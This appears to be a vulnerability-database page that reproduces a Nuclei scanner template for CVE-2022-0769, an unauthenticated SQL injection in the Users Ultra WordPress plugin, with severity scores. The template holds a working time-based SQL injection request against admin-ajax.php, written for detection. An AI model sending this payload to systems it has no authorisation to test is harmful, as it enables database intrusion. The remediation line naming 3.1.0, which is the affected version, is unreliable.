Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-0769
HistoryApr 21, 2023 - 8:56 a.m.

Users Ultra <= 3.1.0 - SQL Injection

2023-04-2108:56:01
ProjectDiscovery
github.com
cve
cve2022
wp
users-ultra
wpscan
sqli
wordpress
wp-plugin
usersultra
sql-injection
security-flaw
data-leakage
unauthorized-access
update-mitigation

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.024 Low

EPSS

Percentile

89.9%

The Users Ultra WordPress plugin through 3.1.0 fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection.
id: CVE-2022-0769

info:
  name: Users Ultra <= 3.1.0 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The Users Ultra WordPress plugin through 3.1.0 fails to properly sanitize and escape the data_target parameter before it is being interpolated in an SQL statement and then executed via the rating_vote AJAX action (available to both unauthenticated and authenticated users), leading to an SQL Injection.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  remediation: |
    Update to Users Ultra version 3.1.0 or later to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/05eab45d-ebe9-440f-b9c3-73ec40ef1141
    - https://wordpress.org/plugins/users-ultra/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0769
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0769
    cwe-id: CWE-89
    epss-score: 0.02367
    epss-percentile: 0.89814
    cpe: cpe:2.3:a:usersultra:users_ultra:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: usersultra
    product: users_ultra
    framework: wordpress
  tags: cve,cve2022,wp,users-ultra,wpscan,sqli,wordpress,wp-plugin,usersultra

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(6)))gwe)--+

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "You have to be logged in to leave your rate")'
        condition: and
# digest: 4a0a0047304502202c86f8644cb483f5c622c81dc5f3c84f10db3835fa21a49497270c6ef42cc868022100d4fcdb326b1bb65c5056f8e677aad1fe82328ed18bc6d80f5890f2456e405b8e:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.024 Low

EPSS

Percentile

89.9%